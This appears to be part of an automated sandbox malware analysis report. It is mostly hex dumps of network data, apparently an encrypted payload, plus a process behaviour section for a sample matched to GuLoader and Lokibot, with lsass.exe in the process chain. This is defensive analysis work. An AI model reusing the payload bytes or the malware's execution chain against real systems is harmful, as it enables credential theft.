                                2021-11-22 14:28:58 UTC0INData Raw: 10 8e 77 8e d6 e9 cf 35 b1 3c 46 2b 0f 11 5a 69 9c 13 88 c5 11 53 c2 b3 b9 b3 10 03 76 6d 3a 37 cc 81 4a ff 80 00 3e 93 73 7e 2a 27 96 47 b4 9b 78 a7 10 1e db d1 31 d7 d2 d3 83 4a c2 95 70 2c 0d 6c a0 7b 9d 9f 48 a3 ce 4d 49 c8 d7 24 8b aa fc b5 8f ee cb 78 ea dc b2 e1 a5 22 c5 e1 2c 4c c3 68 53 95 e4 7a 1b 4e 18 97 11 24 b1 8f a4 87 ca 35 48 0a 9c 2e 2e f1 3e 34 0f 3a 50 f2 b9 e4 f9 1a 53 83 df e0 20 c8 c1 bb 43 d1 4d 99 4b 7b f7 3c 1a 6a 19 2c 78 95 a4 34 a1 59 34 61 72 07 d8 26 b5 91 a7 1e 71 20 96 62 f9 31 31 29 58 d7 5e 7b 0c cd 99 ee d6 ee 23 b0 d6 e2 67 d6 e8 e8 a1 21 a9 1a a3 cb 76 62 68 c0 39 b4 8b a5 04 fd ff f7 26 26 38 37 8e ce 0b 77 c8 a9 52 16 fe a4 62 10 47 98 bd 16 18 08 bd af ac 1b 2a 72 1a 9f 2c bf 19 d0 02 1e ab fd 94 01 15 9a 4b 1b 20
                                Data Ascii: w5<F+ZiSvm:7J>s~*'Gx1Jp,l{HMI$x",LhSzN$5H..>4:PS CMK{<j,x4Y4ar&q b11)X^{#g!vbh9&&87wRbG*r,K
                                2021-11-22 14:28:59 UTC8INData Raw: 16 78 75 03 08 13 48 4a ff 24 31 ca 27 c9 12 f7 49 71 c9 33 e9 82 2f ae 9c ba 04 20 a3 67 b7 dd 27 d8 e4 53 55 1a cb 25 fa 08 0d f8 53 16 91 5b 71 a1 40 54 ba 84 e1 a7 20 64 f4 67 b8 25 0a b5 22 e0 bc bc 2c 4b b5 f3 6b aa 93 15 ec 60 e1 9e 53 18 22 15 3d 2e 20 ca 7d b1 5d 34 20 64 0d 44 bb f2 d7 28 57 58 f4 cb c8 72 ae e2 93 ea 7a 96 80 c3 f0 c6 49 32 33 a4 1d 61 1d 41 8c d7 c1 1f c6 fe 62 49 af c1 88 f0 71 d0 e7 aa f8 f0 83 96 12 c0 94 1a 34 40 c0 8e bd 69 2b 5b 2b 6b df 48 2a 9a 1c c2 1c 7a d9 87 89 00 8b 0d 06 8b e9 d5 ac 46 70 23 7d 57 fb e0 34 2d e3 59 c4 00 c2 dc cc 09 38 20 d9 7a 0e dc e3 df 62 0b 72 fb 4c 1a 71 57 4c fd 29 60 e1 a7 20 bd 2f 38 84 78 5f f1 58 81 28 8e f0 2a 77 67 36 5c 57 c6 b1 c2 cf 5c fb 42 6f b3 9a 95 e2 28 31 f3 ae df 2d 95 68
                                Data Ascii: xuHJ$1'Iq3/ g'SU%S[q@T dg%",Kk`S"=. }]4 dD(WXrzI23aAbIq4@i+[+kH*zFp#}W4-Y8 zbrLqWL)` /8x_X(*wg6\W\Bo(1-h
                                2021-11-22 14:28:59 UTC15INData Raw: 69 62 86 e6 4f b2 37 05 00 a4 c0 8f 70 ec 26 5e 30 3f 89 57 21 17 6b d5 19 ea 74 d2 0d d7 f0 fc 14 03 6e c0 a1 c2 21 8e c8 51 5b 59 a4 b7 ec c1 87 d5 e1 3e 79 63 63 b1 8b 1f 74 e9 98 0b a5 c1 49 b8 55 6e da 59 eb 6a f8 8a a2 ad f3 66 b3 07 79 32 d8 ad e8 8d e3 d3 dc fd 94 cf c7 3a ca f7 18 e0 f4 00 41 af 08 5b cd 15 37 b7 13 98 66 19 be 55 d5 03 e5 e0 30 b5 b4 6e bb 49 d7 59 55 2c 77 89 f5 dd 06 60 16 1d 13 f9 c4 6d 6e 8d e0 a6 78 5c 44 22 f9 e5 f5 0b 1b f0 3e ba 42 dc 6c 81 0e cf 8d c2 a5 4b 50 9d d7 78 1d eb f2 be 73 af 4a e3 97 af b4 1e c5 7f 90 f2 71 a3 5d 69 27 9a b8 ec 98 b3 2c 14 c3 bf e5 dc de 71 b4 59 48 5f b4 fa c5 9c 11 bb 91 3c e1 89 19 e3 02 ad e4 f4 f6 d4 0d 69 9d 56 84 e0 b4 69 61 03 b8 b3 35 0f 27 25 b6 b3 cd 7e 10 db 83 9a 76 21 a4 0b 42
                                Data Ascii: ibO7p&^0?W!ktn!Q[Y>ycctIUnYjfy2:A[7fU0nIYU,w`mnx\D">BlKPxsJq]i',qYH_<iVia5'%~v!B
                                2021-11-22 14:28:59 UTC23INData Raw: 8d cd 25 c7 fc 91 bf 00 62 b4 c3 6f 9a 50 74 35 e9 d1 f5 4a 04 81 42 71 11 7e 79 ed 25 25 96 d2 9c a5 68 5a cd f2 2d 7d 35 b2 e2 b2 ca 8e 44 b9 10 2a 42 aa 56 e6 8a 3e 70 3e f3 53 a1 88 d1 48 84 10 20 58 33 b6 94 29 94 42 31 91 64 64 6f 4c 9b 25 e4 ae c1 bc 05 de 57 8e 3c ff 78 1e d2 8f 0c d6 27 d4 1e 4b f2 58 af 69 88 45 77 08 f3 0b cf 4a 54 1f 5b 8f ce b8 a4 72 8d ab 4d cb 8f c2 a7 71 79 da a4 bd e8 72 1f 96 df a4 8c e8 1b e4 ce f7 18 e0 fc 3a 64 16 de d1 4f 80 d2 64 f4 e4 5d fa 4e 9d 25 5b 6c 23 65 3e 32 64 36 66 53 3e a7 c1 48 52 cf b2 e1 ca 74 9e 13 f9 4e 95 38 39 13 a6 67 54 d1 9a 29 a3 dc 7f 08 f0 d2 e0 fa 98 e6 82 0e e3 28 53 49 2b 08 16 3b a6 30 49 88 81 83 72 59 0f c6 fe 64 77 92 b4 97 98 61 a1 0b 81 d8 db 9b ec ec c0 00 9d d7 d9 0b ff e1 27 61
                                Data Ascii: %boPt5JBq~y%%hZ-}5D*BV>p>SH X3)B1ddoL%W<x'KXiEwJT[rMqyr:dOd]N%[l#e>2d6fS>HRtN89gT)(SI+;0IrYdwa'a
                                2021-11-22 14:28:59 UTC31INData Raw: f8 25 6d 55 a9 31 50 33 df 72 ce f8 44 61 1b bb 59 d5 33 6c ef 3c 95 d1 1c 75 41 9d 7c 95 77 15 fd a1 79 67 1b e1 0d c0 ec 0b 59 dd 4b 6a f2 d1 bc 62 ee 9a df bb 23 c8 be 9d 6c b4 ca b3 b5 b1 ff d9 68 6e 6e 11 0c 0c 4a 78 12 d1 ee ea f7 19 9a 89 54 cf 58 8a 74 b0 67 cf 3e be 2d 55 da 40 44 b9 93 bd 04 78 a5 16 89 a5 19 3a f7 d8 2c 5d ab 47 80 62 9a e3 35 d5 8e df 94 42 45 8e 98 8d a3 d9 df a6 08 03 91 3f d4 19 5b 0b 2d 51 d1 4d 59 c2 fc 69 a5 b1 74 88 f2 5e d9 e5 a0 6b 56 fa 0d 86 42 31 dc 0c 29 9b bb be 1d 7f f1 92 0c 05 5b 9e ea 0c 5d af aa 28 1d 8d 69 8a 70 7b 36 dc 1b f4 de 18 d8 ff bc e5 b1 b7 71 7d 58 4c 52 e1 04 9c 66 19 9b b5 da 06 47 dc 0d 2e 78 14 bb cb a2 93 0f fe a9 aa 12 61 1e 22 0e 1d 55 07 b0 7d 91 7b 28 55 fe f1 30 ff b0 87 e1 80 7e 0b c6
                                Data Ascii: %mU1P3rDaY3l<uA|wygYKjb#lhnnJxTXtg>-U@Dx:,]Gb5BE?[-QMYit^kVB1)[](ip{6q}XLRfG.xa"U}{(U0~
                                2021-11-22 14:28:59 UTC39INData Raw: e8 91 52 4a 3c 56 1e 98 aa 44 62 6c 4c 79 0b a8 1a 75 d5 91 71 d0 c3 80 43 48 cb 35 d6 6a 26 d5 b8 0a 56 56 f3 76 6a 12 ee cd 6f 80 e9 c1 15 8a 06 c6 ab e2 64 f3 0f fd 1d d2 2d 36 8b c6 c6 99 b4 51 b2 29 84 54 33 f1 26 d2 6a a3 76 85 a3 05 1a 3f f7 a1 79 a0 fb b5 77 c7 1c 80 f8 ca 35 41 45 a7 a0 f3 83 87 8a bb 23 21 ac 46 c8 f8 aa be 80 1b 8b 3a 6d fe 77 d0 89 58 31 c2 11 81 86 f2 2b 9f 1f b9 a3 30 a7 fc 93 25 d7 f7 44 67 1b a5 a0 8a 44 b9 db 29 d7 4f 60 16 fd f9 0d 1a 83 1f a9 b4 d8 48 84 9d 6a 30 02 fa a4 15 9d 42 31 f2 64 0e 2f 12 9d 8f 0a 03 6e bc a8 fa 8e 3c 55 de d8 b2 a4 c2 f3 ba a9 1e 9b 3f 87 63 4c e5 48 4a b7 c2 77 73 39 3e de 70 aa ee 5e f4 6c fe f8 92 a2 52 03 97 e8 3f 89 a2 d1 27 1b 7b 96 db 6b ea 4c 88 64 4e d9 1e 64 ae ac af b1 cf 7e 7d 58
                                Data Ascii: RJ<VDblLyuqCH5j&VVvjod-6Q)T3&jv?yw5AE#!F:mwX1+0%DgD)O`Hj0B1d/n<U?cLHJws9>p^lR?'{kLdNd~}X
                                2021-11-22 14:28:59 UTC47INData Raw: 34 36 0c 0a 60 4b ef c1 bf 17 3a 07 84 0a 95 be 6d 02 cd 3b 88 98 53 6c 7f 4c 6e a5 7a 0e 21 b7 a3 39 99 ce 9a 2a 56 cc 97 b2 45 a6 0e dd f1 e8 0f 8c 07 b5 ce b4 3c 73 1d b0 d6 67 1f 0d ba 6e 7f b4 70 10 28 23 08 14 89 1b 43 b7 48 b9 69 fb 4b 56 2a 0a 56 c4 44 8a d6 3d c1 9d 66 80 4f b6 95 d6 b5 fe d1 83 c5 e4 6c d0 6f b8 8a aa 3d 3a 6f 26 15 d8 57 74 0f f9 b6 db d7 45 3d 42 fc cd c2 b6 c5 7b 01 dd 42 e8 1c b8 03 ec 18 24 ba 35 ca 96 5e 78 1a 41 0e f8 8a 83 59 e1 1e 3c c8 22 83 46 8e 23 f1 41 16 7d 81 c4 b4 44 f9 fa 6b f9 79 45 51 10 e7 df 5f 08 dd 76 63 5e 5b 52 c6 e6 cb 9d 1a 03 a2 de 12 ed 95 6a 12 0e b0 69 d4 f9 b6 50 9c a9 c0 f8 bc d8 e9 bb 24 28 cc ba 2e 2d b5 ef e8 eb a0 90 8c a8 ba f1 50 f8 91 46 50 05 06 49 e9 08 c7 e5 89 38 79 1e 5b eb 38 9c 6f
                                Data Ascii: 46`K:m;SlLnz!9*VE<sgnp(#CHiKV*VD=fOlo=:o&WtE=B{B$5^xAY<"F#A}DkyEQ_vc^[RjiP$(.-PFPI8y[8o
                                2021-11-22 14:28:59 UTC55INData Raw: ca b0 7c 2c 37 f9 4c 95 7e dc 99 45 ad e8 d5 66 12 0d f1 49 0b 07 ac ec 0c 13 60 35 b6 27 ad e5 14 0c 7d 21 a9 fc c5 2e dc 78 c8 c2 9c 98 81 19 1f 42 67 8d 23 a3 f5 91 34 6f c0 f8 f6 be 89 92 8b dd 5e 68 de 5c fe a8 d5 cb 20 e5 f0 65 3f 68 d4 4c 3d a0 7a 8b 60 73 6a 5a c4 df f8 7d 56 5f 00 1f 79 36 f9 ed ce 87 99 6c b1 29 6a c6 71 22 33 cb 78 43 06 a2 4d 0f 9e b3 6d 15 8f 2e 42 38 c3 f5 c9 cb 15 9f d1 c3 d1 92 71 bf 07 9f 10 3a b4 bd 17 50 b7 88 6b 70 a1 cc 96 3d d5 eb 8b 9b 7d 9c b9 23 93 0b d8 75 aa 1a f3 6b 88 47 ec 4e 34 88 f6 9a f5 36 67 d7 c3 3a 87 87 e9 66 10 8d ee 6d a0 ff 6b a7 a0 d6 5e a1 10 22 55 d4 05 9b 51 b6 7a 76 10 6d 39 a9 8f 0b 33 b7 6a 85 9a 99 88 08 f3 1c c8 d1 e7 49 33 46 1d ec fa 28 f1 d8 ab 67 b5 30 0c e5 cd fc 79 b6 38 62 f0 60 47
                                Data Ascii: |,7L~EfI`5'}!.xBg#4o^h\ e?hL=z`sjZ}V_y6l)jq"3xCMm.B8q:Pkp=}#ukGN46g:fmk^"UQzvm93jI3F(g0y8b`G
                                2021-11-22 14:28:59 UTC62INData Raw: 43 bd 9a 40 83 b7 de a6 b0 4d 4e 1f 1d 66 fe 0b 87 fb 82 23 63 1a 8a 87 66 3a b4 85 4e 5b c9 40 39 d9 00 0d 8a 64 a2 a6 05 1c c0 2c 1b f9 ae c9 ff 78 43 9f 8a f7 6a 87 e3 0c ae 12 95 43 ad a0 dc 8b d6 b4 80 d9 8d ff 30 75 7a b9 11 98 d3 99 6d 91 fc 4d 8e 0a 97 f0 a6 22 9d bb 9d c2 80 40 e8 47 6b 12 0d de 1f f4 60 c1 90 fa 86 3e 84 b2 01 22 38 d3 f8 fd cd 3a 1d ed 09 6c 7f 08 6d a5 7a 0e 45 74 a3 39 99 ce 9a 2b ff 46 4e a9 88 4f f5 7c 6c 91 47 21 92 4a ce b5 a9 06 1e 3a 13 7c d2 e4 41 cf f4 cd 2a bd 28 a9 77 38 75 29 54 9d ee 82 a2 f4 28 a0 b2 a5 41 56 9e 00 d1 8c ee 06 ed 78 41 0d bd 50 2e fe 77 51 d7 fc af ea 15 87 a7 f6 5e 12 80 43 b4 ac eb d6 b9 7f 5e 16 f5 d2 6a 71 ee 25 b9 fb 60 84 58 05 0d 01 82 2e e2 00 f3 c8 64 30 a2 3e 8e 6f e5 5e 07 a3 7c c0 9d
                                Data Ascii: C@MNf#cf:N[@9d,xCjC0uzmM"@Gk`>"8:lmzEt9+FNO|lG!J:|A*(w8u)T(AVxAP.wQ^C^jq%`X.d0>o^|
                                2021-11-22 14:28:59 UTC70INData Raw: 44 8e e0 3c 49 90 46 e5 9f 15 a6 49 b1 db 3c de 68 05 c9 81 77 6e d8 ea 8e 80 9a 48 38 bc 61 64 68 2c cd 7f 39 3f d4 3a 6a bb e9 f9 e7 82 75 4d 42 d3 d1 cd c8 bc 27 ea f5 48 6e 5e e7 2e ac ee 06 88 0a 16 b0 8a f4 fd f9 9f e3 24 75 fc db a4 fa 18 4d e1 f0 de a2 2f 90 01 f5 33 08 cf 56 57 2e 97 6a 39 43 a3 62 d8 c6 56 e3 70 33 b9 3b 95 2b 0d 0e ec f1 40 6f 2f ea 4f 27 08 6d 2c 93 35 d1 10 52 1a 68 bd 7d 81 82 af b1 1b dc 78 c8 c2 9c 2a ad e1 4f 2a cb 21 78 29 cf 5c 8e 09 4c 61 80 8e 19 35 94 95 f8 77 b7 c5 02 e1 a0 e6 42 57 46 b1 b9 b3 07 ca dd 2a e7 cf f0 2b 6a 33 c8 56 d5 bc 69 60 8e 13 f1 b4 e8 59 5a 4a 3c 12 e0 4f e3 6b 4b 48 45 79 79 a8 63 11 28 a9 a5 03 e5 4c 7c cb 76 8d a3 52 5c e0 41 60 69 dd 30 1a 73 16 3e 72 75 2e 47 b3 2a 46 2e 88 53 26 1b 71 08
                                Data Ascii: D<IFI<hwnH8adh,9?:juMB'Hn^.$uM/3VW.j9CbVp3;+@o/O'm,5Rh}x*O*!x)\La5wBWF*+j3Vi`YZJ<OkKHEyyc(L|vR\A`i0s>ru.G*F.S&q
                                2021-11-22 14:28:59 UTC78INData Raw: 68 bc e0 6c 3d 00 d8 bf aa 7b 0d 51 d9 fa a4 f1 0e 11 0c a5 bf 5c 7f fc 92 98 f4 ae 00 eb 02 ba e4 0b d0 f1 f8 4f bc c5 34 3e eb fd 92 13 bb e4 41 67 08 0b 68 2d 2f 4a eb 9b 06 af 81 a0 77 ab 59 dc 87 9c bf e7 75 8d 9d 42 ae 63 ef e6 db f5 40 ae 5e f6 68 eb 4b 49 5e 21 79 ca 4c b4 e8 83 71 31 79 44 fe de fc 37 91 5f 57 09 1a 4d 32 82 54 05 11 95 1d fc 01 08 f3 76 63 c6 ef 97 f5 8a c5 b0 c0 4a 5a d2 ec 77 b5 f1 d6 0a e2 2e ef 5b a9 82 02 81 97 32 29 f5 d9 f7 c6 bd e3 0c 74 5d 75 20 92 45 7a ff 12 05 f1 45 82 2c d1 4a f1 52 ca 8e c7 04 b9 1a 68 37 04 8a 1f ee a9 35 7e 38 59 5d 9b 12 07 b1 4c aa 64 ca 8a 0b 1c 70 7c ed a1 83 80 04 88 8f 19 04 c7 76 86 c5 47 be b7 68 58 57 69 67 3f 1e 73 56 58 95 1b 21 e2 d4 ff cc d7 ae 55 fe e9 cb 93 fa 34 67 86 a6 ce b5 90
                                Data Ascii: hl={Q\O4>Agh-/JwYuBc@^hKI^!yLq1yD7_WM2TvcJZw.[2)t]u EzE,JRh75~8Y]Ldp|vGhXWig?sVX!U4g
                                2021-11-22 14:28:59 UTC86INData Raw: 53 e7 e4 15 1b 39 18 e4 11 41 b1 eb a4 e6 ca 41 48 6b 9c 00 2e 95 3e 56 0f 3a a0 f2 b9 e9 fd 0c e9 ec ad 26 48 7c e0 03 42 f9 e9 db 6b 13 9e 4f 3a 7e 0a 37 7e e7 c5 59 81 49 21 7d 75 06 cb 06 d7 a7 e2 1e 72 2b c4 0b 97 58 75 08 0b 84 33 60 68 c9 b7 8f db 88 07 f4 d6 8b 67 a4 e8 e8 6d ec d1 e4 2b 67 60 9c e0 23 2f 5f 03 5d 12 07 7e 62 b3 d9 b1 de 98 3f 40 95 83 74 d8 ca e8 65 ef d5 5e 15 34 f9 0e ca 80 f0 5f c6 a1 ab 0c 46 a4 76 0f 0f 8e 9e bd 70 15 9c 96 59 c2 d4 36 33 e5 ee b1 15 44 8c 06 ee e2 62 82 07 0b 1f 09 c6 66 d2 01 dc b1 a4 90 3c b2 e7 f8 d4 4a 4f a3 8e 0a 29 08 c9 56 64 c6 b5 7c 7a 43 9a 8a 72 f7 d9 1c 86 f7 ed 65 ad e8 2a 85 5c 9b 10 05 5d 82 1f 54 ec 85 23 9a af 2f 79 ad 8b 97 ab 71 1b f7 d4 4e 97 81 d0 9d 2c 70 60 6d d2 1f 2a 67 bf 75 9d 9f
                                Data Ascii: S9AAHk.>V:&H|BkO:~7~YI!}ur+Xu3`hgm+g`#/_]~b?@te^4_FvpY63Dbf<JO)Vd|zCre*\]T#/yqN,p`m*gu
                                2021-11-22 14:28:59 UTC94INData Raw: 84 30 71 45 8a 18 11 6c 07 2b 33 ee af 23 47 ea 28 42 44 0b a4 b0 67 d4 bd 3a 67 a1 4a a8 ee c4 37 da e9 9a bc 19 98 b9 dc 82 ca 4f ea ec 26 41 c9 68 53 95 e4 7a 1b 4e 18 97 11 24 b1 8f a4 87 ca 35 48 0a 9c 2e 2e f1 3e 34 0f 3a a0 f2 b9 e4 f7 05 e9 8d df 54 29 05 e0 03 42 9d 80 b8 1f 13 9e 4f 3a 1a 6b 43 1f e7 c5 59 81 3a 55 b2 ab 26 c7 c7 f2 d9 83 9a d2 1a 5a d6 35 73 58 09 8e fc 64 39 62 a0 a6 a7 d4 8c e3 f8 ac b1 e9 d6 e8 e8 6d 7a e1 e3 5c 4b 01 c1 0e d6 7e 10 9a 10 d6 3d 79 ac 47 e1 c1 ae 3d 00 a9 77 16 60 46 88 60 d2 e1 14 e6 e9 4d a4 e7 70 60 15 86 64 36 f5 40 84 ad ae 73 cc f0 b5 90 e8 f2 44 8b 88 52 d3 26 aa f8 40 91 f6 2e a5 77 31 11 dd c3 cb 8f 0b dd 1c 7c 39 e5 01 dc f5 25 cd 46 53 7d 5b c9 58 3b 92 19 99 a0 ce 32 7b 3f f7 81 d5 8a 90 00 50 ab
                                Data Ascii: 0qEl+3#G(BDg:gJ7O&AhSzN$5H..>4:T)BO:kCY:U&Z5sXd9bmz\K~=yG=w`F`Mp`d6@sDR&@.w1|9%FS}[X;2{?P
                                2021-11-22 14:28:59 UTC101INData Raw: f3 1a 91 04 47 c9 0b 5d 72 6a f2 2c ea a4 c0 af 82 d5 fb d0 8d 3f cc be 5f 80 38 68 01 94 93 3a 2e 44 11 eb c7 a6 c7 85 9a 54 6d 3d a5 25 2e 44 55 69 f6 55 51 2c e4 7e 7e 1e 6a 4a 47 87 c0 4d 7d ca 40 36 30 7b 9e 9f 48 a3 ca 4d 49 c8 28 db 8b aa 44 b5 8f ee cb 78 ea dc f2 e1 a5 22 c5 e1 2c 4c c3 68 53 95 e4 7a 1b 4e 18 97 11 24 b1 8f a4 87 ca 35 48 0a 9c 2e 2e f1 3e 34 0f 3a a0 f2 b9 e4 f7 05 e9 8d df 54 29 05 e0 03 42 9d 80 b8 1f 13 9e 4f 3a 1a 6b 43 1f e7 c5 59 81 3a 55 0f 1c 68 ac 06 d7 f4 87 6c 04 4e b6 0b 97 11 75 66 0b f7 33 14 68 a8 b7 e3 db e4 07 b0 d6 e2 67 d6 e8 e8 6d ec d1 e4 2b 67 60 cf e0 6c 2f 19 03 09 12 50 7e 23 b3 8b b1 9b 98 63 40 d4 83 04 d8 ba e8 09 ef b0 5e 35 34 ba 0e a5 80 9d 5f b6 a1 de 0c 32 a4 13 0f 7d 8e b2 bd 50 15 d5 96 37 c2
                                Data Ascii: G]rj,?_8h:.DTm=%.DUiUQ,~~jJGM}@60{HMI(Dx",LhSzN$5H..>4:T)BO:kCY:UhlNuf3hgm+g`l/P~#c@^54_2}P7


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: 2GirCpksIO.exe PID: 7984 Parent PID: 8080

                                General

                                Start time:15:27:32
                                Start date:22/11/2021
                                Path:C:\Users\user\Desktop\2GirCpksIO.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\2GirCpksIO.exe"
                                Imagebase:0x400000
                                File size:114688 bytes
                                MD5 hash:5CC619F7DD365EC061F1F385D25BEA30
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: UserOOBEBroker.exe PID: 4236 Parent PID: 1036

                                General

                                Start time:15:28:06
                                Start date:22/11/2021
                                Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                Imagebase:0x7ff74e590000
                                File size:57856 bytes
                                MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: 2GirCpksIO.exe PID: 4560 Parent PID: 7984

                                General

                                Start time:15:28:16
                                Start date:22/11/2021
                                Path:C:\Users\user\Desktop\2GirCpksIO.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\2GirCpksIO.exe"
                                Imagebase:0x400000
                                File size:114688 bytes
                                MD5 hash:5CC619F7DD365EC061F1F385D25BEA30
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: lsass.exe PID: 1016 Parent PID: 4560

                                General

                                Start time:15:29:04
                                Start date:22/11/2021
                                Path:C:\Windows\System32\lsass.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\lsass.exe
                                Imagebase:0x7ff735390000
                                File size:59448 bytes
                                MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Code Analysis

                                Reset < >